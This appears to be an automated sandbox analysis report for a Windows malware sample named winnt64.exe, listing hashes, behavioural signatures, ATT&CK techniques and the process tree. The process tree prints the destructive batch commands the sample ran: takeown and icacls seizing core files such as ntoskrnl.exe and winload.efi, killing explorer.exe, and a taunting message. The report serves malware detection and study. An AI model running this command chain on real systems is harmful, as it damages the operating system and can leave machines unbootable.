Overview

overview

8

Static

static

3

winnt64.exe

windows11-21h2-x64

Analysis

  • max time kernel
    136s
  • max time network
    99s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01-07-2024 02:25

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    winnt64.exe

  • Size

    188KB

  • MD5

    aa992d93467882ff211f211495e6c545

  • SHA1

    75a1a182af719168b9ca7b9c42282b997f82d443

  • SHA256

    dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88

  • SHA512

    54d07b5f123b20128459de04694ed295275498c646fef596830c2c98ff1a8fa4741c95ce72be6d59a713fc6d7d7365c4f13eace2ed6bf357ebef44885b882d5d

  • SSDEEP

    3072:vV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPTYEbXEC+gwNDF/Kjs:it5hBPi0BW69hd1MMdxPe9N9uA069TBk

Score
8/10
defense_evasiondiscoveryexploit

Malware Config

Signatures

  • Possible privilege escalation attempt 14 IoCs
    exploit
  • Modifies file permissions 1 TTPs 14 IoCs
    discovery
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
    defense_evasion
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\winnt64.exe
    "C:\Users\Admin\AppData\Local\Temp\winnt64.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat C:\Users\Admin\AppData\Local\Temp\winnt64.exe"
      2⤵
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\ntoskrnl.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:856
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4176
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\hal.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:408
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\hal.dll" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3344
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\ci.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2964
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\ci.dll" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1992
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\System32\winload.efi"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1676
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\System32\winload.efi" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1612
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Program Files\WindowsApps"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4800
      • C:\Windows\system32\icacls.exe
        icacls "C:\Program Files\WindowsApps" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:540
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\SystemApps"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1724
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\SystemApps" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1576
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\Windows\ImmersiveControlPanel"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
      • C:\Windows\system32\icacls.exe
        icacls "C:\Windows\ImmersiveControlPanel" /grant everyone:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:916
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5000
      • C:\Windows\system32\notepad.exe
        notepad.exe
        3⤵
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3592
        • C:\Windows\System32\Taskmgr.exe
          "C:\Windows\System32\Taskmgr.exe"
          4⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4808
          • C:\Windows\System32\Taskmgr.exe
            "C:\Windows\System32\Taskmgr.exe" /1
            5⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:2968
      • C:\Windows\system32\timeout.exe
        timeout /t 30 /nobreak
        3⤵
        • Delays execution with timeout.exe
        PID:4976
      • C:\Windows\system32\msg.exe
        msg * ITS TOO LATE TO REPAIR YOUR PC! I'VE PROBABLY HANGED YOUR PC HAHAHAHA
        3⤵
          PID:1840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell wininit
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:112
          • C:\Windows\system32\wininit.exe
            "C:\Windows\system32\wininit.exe"
            4⤵
              PID:4020

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      File and Directory Permissions Modification

      2
      T1222

      Windows File and Directory Permissions Modification

      1
      T1222.001

      Credential Access

      Discovery

      System Information Discovery

      2
      T1082

      Query Registry

      1
      T1012

      Peripheral Device Discovery

      1
      T1120

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
        Filesize

        64KB

        MD5

        c27c1374edd5b819ac9f67c91d286373

        SHA1

        6768048f19f4dd2a3ab401e9f0b57570601f24a8

        SHA256

        a2d78e1e44733d24842f4e3a4fb86abd35219df6f6e90393c59abe99e1bb9ec0

        SHA512

        82bda0747e2e965f9e7a24ae494342af3f96043609eee38db74d18a3da0ddb0c2dabbb23c3f9223e5d0e89256b0b7a4ae0a0537966dd57a181a4505ad8a462c3

        Download Submit
      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
        Filesize

        4B

        MD5

        f49655f856acb8884cc0ace29216f511

        SHA1

        cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

        SHA256

        7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

        SHA512

        599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

        Download Submit
      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
        Filesize

        960B

        MD5

        4f55be8451c1090c2a54a50d79243cfb

        SHA1

        f1a94bc446b6ae32300ada858fb251667a17b71d

        SHA256

        1b8257869915ac04445cb4bfdc0e0fc03db80efb96da98c49e7cbc4097bc28a2

        SHA512

        b87403fc4ab05cd4dd092d0707cd0dd22f927c65dcf73bce6f6bf2731f0572e089697908eeb377617c9f2531fdb3a495087feafb31871ea9a6f472a45d9d20f6

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
        Filesize

        14KB

        MD5

        00b3ce0e658cf92f7ea6ed8e36f76966

        SHA1

        7109d316553b321577fe6090df84d7182aafa590

        SHA256

        76b1b9ebbd2b4b90dd4447c698ee7c76ef2a75399a0f33ccb79b1389f679378a

        SHA512

        eb7998a902bd25847219db3f1800efa94235ee2d62077468993160346255fcfa8acc1b2918aae01cf052c02b9e385b3ec3faf61a425d5924c6709586f87be893

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat
        Filesize

        1KB

        MD5

        c7b7a1bdb6c0ed883395fb5c63fcf775

        SHA1

        2cb74dbd18ff3cb8d8df73abbb2e801964925348

        SHA256

        0d4be7c8c1ea9439dcd902e072da04a8b3cc0823c596749dbb8e23382973464c

        SHA512

        acc6bff3eca0c42f7fe410df3744a6d714ab2263aead18a1bed6e7a29772891bd190888b576e0044f7eebdff8a22903d821c486733792efd94e1d16d3380296d

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3tita52.edg.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • memory/112-36-0x0000014AB3AA0000-0x0000014AB3AC2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4808-5-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-15-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-14-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-13-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-11-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-16-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-17-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-12-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-6-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4808-7-0x0000019F0AEF0000-0x0000019F0AEF1000-memory.dmp
        Filesize

        4KB

        Download